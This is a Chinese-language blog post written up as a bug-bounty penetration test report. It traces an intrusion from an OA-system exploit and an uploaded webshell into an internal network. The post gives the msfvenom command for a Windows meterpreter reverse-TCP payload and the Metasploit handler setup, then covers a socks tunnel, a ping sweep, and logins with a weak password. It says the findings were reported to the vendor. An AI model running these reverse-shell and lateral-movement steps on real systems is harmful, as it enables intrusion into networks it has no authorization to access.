前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >从web渗透到内网提交了多个漏洞,一点都不能忽视安全系统!

从web渗透到内网提交了多个漏洞,一点都不能忽视安全系统!

原创
作者头像
雨笋教育
修改2021-08-25 11:29:37
6670
修改2021-08-25 11:29:37
举报
文章被收录于专栏:雨笋教育

雨笋教育小编来给大家分享干货了,由于最近某SRC开启众测福利,所以咱就跟着挖个洞,写篇文章,一举两得。(厚码见谅)嘿嘿

渗透开始

  1. WEB撕口子:
  2. Web方面的突破口是一个OA系统

远OA嘛大家都知道,网上复现教程也特别多所以就不在多啰嗦了直接上EXP利用,(工具是本人自己写的哈),地址是各OA-EXP

传完马子冰蝎连接准备后续操作

到这里本想添加个用户直接远程登陆服务器了,但是遇到了点问题远程桌面没开启(也可能是换了端口)

  1. 然后我们试着找找rdp服务看看是否启用,端口是多少
  2. tasklist /svc | find "Ter"
  3. 这里我们发现RDP服务存在,端口被改成了3308
  1. 内网部分:
  2. 用IP:3308登陆结果还是拒绝连接,这时候怀疑是只允许内网登陆,我们用MSF生成个马子,先上线MSF再说
  3. msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=MSFIP地址 LPORT=端口 -f exe -o /root/vhs.exe
  4. 然后开启监听并将root目录下生成的马子上传到目标中运行
  5. 监听:
  6. msf6> use exploit/multi/handler
  7. msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  8. msf6 exploit(multi/handler) > set lhost 127.0.0.1
  9. msf6 exploit(multi/handler) > set lport 3080
  10. msf6 exploit(multi/handler) > exploit
  11. 上线以后查看系统信息,权限等

12.发现是用户权限,使用默认的提权来试试,直接OK...

接下来搭建个socks5隧道,以便内网横向啥的。这里我使用的是NPS隧道,这个在Github上开源的项目,这里就不细说了。

  1. 搭建好隧道以后使用proxychains连接socks隧道,此时我们MSF机器的IP已经变成目标机的IP地址了
  1. 这次使用内网的IP登陆远程桌面,已经发现可以登陆了
  1. MSF接着信息收集,扫描内网主机发现没域控,那就直接用目标的cmd一句话探测了
  1. C:\Windows\system32>for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"
  2. for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"
  3. Reply from 192.168.*.21: bytes=32 time<1ms TTL=128
  4. Reply from 192.168.*.22: bytes=32 time<1ms TTL=128
  5. Reply from 192.168.*.100: bytes=32 time<1ms TTL=128
  6. Reply from 192.168.*.101: bytes=32 time<1ms TTL=128
  7. Reply from 192.168.*.102: bytes=32 time<1ms TTL=128
  8. Reply from 192.168.*.103: bytes=32 time<1ms TTL=64
  9. Reply from 192.168.*.105: bytes=32 time<1ms TTL=128
  10. Reply from 192.168.*.106: bytes=32 time<1ms TTL=128
  11. Reply from 192.168.*.107: bytes=32 time<1ms TTL=128
  12. Reply from 192.168.*.108: bytes=32 time<1ms TTL=64
  13. Reply from 192.168.*.150: bytes=32 time<1ms TTL=128
  14. Reply from 192.168.*.151: bytes=32 time<1ms TTL=128
  15. Reply from 192.168.*.155: bytes=32 time<1ms TTL=128
  16. Reply from 192.168.*.187: bytes=32 time<1ms TTL=128
  17. Reply from 192.168.*.188: bytes=32 time<1ms TTL=128
  18. Reply from 192.168.*.189: bytes=32 time<1ms TTL=128
  19. Reply from 192.168.*.201: bytes=32 time<1ms TTL=128
  20. Reply from 192.168.*.254: bytes=32 time<1ms TTL=255
  21. Reply from 192.168.*.254: bytes=32 time<1ms TTL=255
  22. 通过TTL可以看到应该两台Linux机器,直接SSH连接,密码123456789登陆成功。。。

23.Windows也一样,密码123456789图就不贴了没意思。。

  1. 成果
  2. 避免影响人家业务就没有进行批量端口扫描等大量占用带宽的行为就只测了常用端口
  3. 弱口令拿下两台内网Linux服务器
  4. 弱口令拿下多台Windows服务器
  5. 内网弱口令拿下两个后台管理系统
  6. 修复建议
  7. 问题漏洞已提交厂商
  8. 友情提示大家别因为是内网就放松警惕,那密码直接就123456。。。都整无语了
  9. 然后欢迎也大家跟我一起交流学习,文章有哪里不足请各位大佬多多包涵

本文来源:网络

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
漏洞扫描服务
漏洞扫描服务(Vulnerability Scan Service,VSS) 是一款自动探测企业网络资产并识别其风险的产品。依托腾讯二十年累积的安全能力,漏洞扫描服务能够对企业的网络设备及应用服务的可用性、安全性与合规性等进行定期的安全扫描、持续性风险预警和漏洞检测,并且为企业提供专业的修复建议,降低企业安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档